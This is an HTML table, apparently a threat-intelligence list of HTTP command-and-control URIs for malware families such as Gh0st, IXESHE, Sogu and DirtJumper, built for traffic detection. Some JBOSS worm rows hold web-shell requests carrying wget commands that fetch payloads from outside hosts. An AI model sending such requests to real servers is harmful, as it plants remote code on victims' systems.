<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Depyot"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Depyot</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/new/3d/d/pdf.php?id=2"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/new/3d/d/pdf.php?id=2</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Destory Rat / Sogu / Thoper"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Destory Rat / Sogu / Thoper</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/update?id=000f6b50"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/update?id=000f6b50</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Destory Rat / Sogu / Thoper"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Destory Rat / Sogu / Thoper</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/update?id=3109c2a2"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/update?id=3109c2a2</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Destory Rat / Sogu / Thoper"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Destory Rat / Sogu / Thoper</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/update?product=windows"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/update?product=windows</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"DirtJumper DDoS"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">DirtJumper DDoS</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/678/index.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/678/index.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Dirtjumper ddos"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Dirtjumper ddos</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/boi854tr4w.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/boi854tr4w.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"DNSChanger"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">DNSChanger</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/d56sc1d56scd56sc1.php?ini= v22Mmjy0SYXyWTI0tQ0QQOdqOb68 J9I6ModWQnN1eE1VXw/T3BWOyTujBlrHIQqMgMqV75 0QegiB MF4XAHPzbYqRtufQpaX/M/trvO7ukg=="]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/d56sc1d56scd56sc1.php?ini= v22Mmjy0SYXyWTI0tQ0QQOdqOb68 J9I6ModWQnN1eE1VXw/T3BWOyTujBlrHIQqMgMqV75 0QegiB MF4XAHPzbYqRtufQpaX/M/trvO7ukg==</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Downloader BMP"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Downloader BMP</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/images/evil.bmp"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/images/evil.bmp</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Einstein"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Einstein</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/gttfi.php?id=019451425260376469&ext =YmFkc3R1ZmYuZGxs"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/gttfi.php?id=019451425260376469&ext =YmFkc3R1ZmYuZGxs</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Einstein data send"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Einstein data send</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/gttfi.php?id=019451425260376469& ext=ixioJXXJFCRrrDatKHhK"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/gttfi.php?id=019451425260376469& ext=ixioJXXJFCRrrDatKHhK</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME EK"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME EK</span></td><td data-sheets-value="[null,2,"EK - Blackhole 2 landing"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">EK - Blackhole 2 landing</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/news/default-php-version.php?mdm=30:1g:2v:1f:1o& xguc= 3b:3i:39: 35&nze=1l:1f:30:1l:2v:30:1m:2v:1n:30&bhn=lixvdd"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/news/default-php-version.php?mdm=30:1g:2v:1f:1o& xguc= 3b:3i:39: 35&nze=1l:1f:30:1l:2v:30:1m:2v:1n:30&bhn=lixvdd</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME EK"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME EK</span></td><td data-sheets-value="[null,2,"EK Blackhole 1"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">EK Blackhole 1</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/showthread.php?t=d7ad916d1c0396ff"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/showthread.php?t=d7ad916d1c0396ff</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME EK"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME EK</span></td><td data-sheets-value="[null,2,"EK Phoenix"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">EK Phoenix</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/navigator/jueoaritjuir.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/navigator/jueoaritjuir.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Enfal / Lurid"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Enfal / Lurid</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/oi2c/wlc3/ [reducted]:00-00-00-00-00-00/ij83d"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/oi2c/wlc3/ [reducted]:00-00-00-00-00-00/ij83d</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Enfal / Lurid"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Enfal / Lurid</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/trandocs/nm/.[reducted] :00-00-00-00-00-00lCrrrwhite"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/trandocs/nm/.[reducted] :00-00-00-00-00-00lCrrrwhite</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Enfal / Lurid"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Enfal / Lurid</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/cgi-bin/CMS_SubitAll.cgi"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/cgi-bin/CMS_SubitAll.cgi</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Enfal / Lurid"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Enfal / Lurid</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/cgl-bin/Owpq4.cgi"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/cgl-bin/Owpq4.cgi</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Enfal / Lurid"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Enfal / Lurid</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/Sjwpc/odw3ux"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/Sjwpc/odw3ux</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Flashback OSX"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Flashback OSX</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/statistics.html"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/statistics.html</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Foxy"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Foxy</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/404error.asp"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/404error.asp</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Foxy Checkin"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Foxy Checkin</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/images/leftnav_prog_bg.jpg"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/images/leftnav_prog_bg.jpg</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Gh0st ASP ver"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Gh0st ASP ver</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/1/v2/1oginv2.asp?hi2wsdf351&x.\u2019..[xf)..<.3XqHr....)IL{..&y192.168.0.69"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/1/v2/1oginv2.asp?hi2wsdf351&x.’..[xf)..<.3XqHr....)IL{..&y192.168.0.69</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Gh0st PHP ver"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Gh0st PHP ver</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/ld/queenfun/vl /login.php?cd2hpdGU&uU11T VEV&s&pMTkyLjE2OC4wljYS&hi2wsdf35l"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/ld/queenfun/vl /login.php?cd2hpdGU&uU11T VEV&s&pMTkyLjE2OC4wljYS&hi2wsdf35l</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Gh0st v2000 var"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Gh0st v2000 var</span></td><td data-sheets-value="[null,2,"n"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">n</span></td><td data-sheets-value="[null,2,"v2010........f...............(\n......Service Pack 2..?..|...|...|0.@.."]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">v2010........f...............(<br />......Service Pack 2..?..|...|...|0.@..</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"GoogleAdC2"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">GoogleAdC2</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/html/lost.html"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/html/lost.html</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"GoogleAdC2 2nd stage"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">GoogleAdC2 2nd stage</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/Trojan2.jpg"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/Trojan2.jpg</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Googles"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Googles</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/sll/monica.jpg"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/sll/monica.jpg</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Greencat"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Greencat</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/<HOSTNAME>/"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/<hostname>/</hostname></span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Gtalk"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Gtalk</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/facebook.png"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/facebook.png</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"Hacktivism"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Hacktivism</span></td><td data-sheets-value="[null,2,"HOIC DDoS"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">HOIC DDoS</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/ HTTP/1.0"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/ HTTP/1.0</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Imaut"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Imaut</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/setting.doc"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/setting.doc</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"IRCbot"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">IRCbot</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/check_ver.php?version=1.09"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/check_ver.php?version=1.09</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"IXESHE"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">IXESHE</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/AWS26329.jsp? UrFvwIJIOKTRyfxR9KNRqhg8lcPr/ CGjUwP8y JUs7RjH7OinJ/85cgrqiP8jKGjpqgb/\nwTrO7OIjhxoHcGaFa URqK/aHophHLd23K=NHk= a9oQ hvDQaLky8qo/RnJz42A"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/AWS26329.jsp? UrFvwIJIOKTRyfxR9KNRqhg8lcPr/ CGjUwP8y JUs7RjH7OinJ/85cgrqiP8jKGjpqgb/<br />wTrO7OIjhxoHcGaFa URqK/aHophHLd23K=NHk= a9oQ hvDQaLky8qo/RnJz42A</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"IXESHE AES"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">IXESHE AES</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/AES210001 129016878.jsp?UrFwUIO3h7ofgw QInYPRbkQaHVM9Bih7kZ9rO+pKUrbklllsgfOk=\n+LLQhpkZ9LOhGbgqvJghHci7M"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/AES210001 129016878.jsp?UrFwUIO3h7ofgw QInYPRbkQaHVM9Bih7kZ9rO+pKUrbklllsgfOk=<br />+LLQhpkZ9LOhGbgqvJghHci7M</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"JBOSS worm"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">JBOSS worm</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/zecmd/zecmd.jsp?comment=perl+lindb.pl"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/zecmd/zecmd.jsp?comment=perl+lindb.pl</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"JBOSS worm"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">JBOSS worm</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/idssvc/idssvc.jsp?comment= wget+http://webstats.dyndns.info/javadd.tar.gz"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/idssvc/idssvc.jsp?comment= wget+http://webstats.dyndns.info/javadd.tar.gz</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"JBOSS worm"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">JBOSS worm</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/iesvc/iesvc.jsp?comment=wget+http://magicstick.dyndns-remote.com/kisses.tar.gz"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/iesvc/iesvc.jsp?comment=wget+http://magicstick.dyndns-remote.com/kisses.tar.gz</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Letsgo / TabMsgSQL"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Letsgo / TabMsgSQL</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/indexbak.asp?rands= IXLCGIXELZ&acc=&str= select%20id%20from %20tab_online%20 where%20regc\node%20=%20'IXLCGIXELZ'"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/indexbak.asp?rands= IXLCGIXELZ&acc=&str= select%20id%20from %20tab_online%20 where%20regc<br />ode%20=%20'IXLCGIXELZ'</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Letsgo / TabMsgSQL"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Letsgo / TabMsgSQL</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/safe/1.asp?rands=DWLLOXLGLH&acc=vy&str= select%20top%201%20%20\n from%20tab_message%20where%20toid%20= %20'198'%20order%20by%20id%20asc"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/safe/1.asp?rands=DWLLOXLGLH&acc=vy&str= select%20top%201%20%20<br /> from%20tab_message%20where%20toid%20= %20'198'%20order%20by%20id%20asc</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Letsgo / TabMsgSQL"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Letsgo / TabMsgSQL</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/safe/1.asp?rands=XJOTLVALQF&acc=vy&str= insert%20into%20tab_online%20\n (mode,clientname,clientip,accessip,onlinetime, lasttime,regcode)%20values%20\n ('0','victim','192.168.1.12','145.42.112.19', '2011-06-08%2013:45:54',\n '2011-06-08%2013:45:54','NMQVPTXFBH')"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/safe/1.asp?rands=XJOTLVALQF&acc=vy&str= insert%20into%20tab_online%20<br /> (mode,clientname,clientip,accessip,onlinetime, lasttime,regcode)%20values%20<br /> ('0','victim','192.168.1.12','145.42.112.19', '2011-06-08%2013:45:54',<br /> '2011-06-08%2013:45:54','NMQVPTXFBH')</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Letsgo / TabMsgSQL downloader"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Letsgo / TabMsgSQL downloader</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/new/iistart.html"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/new/iistart.html</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Likseput"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Likseput</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/index.html"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/index.html</span></td></tr>
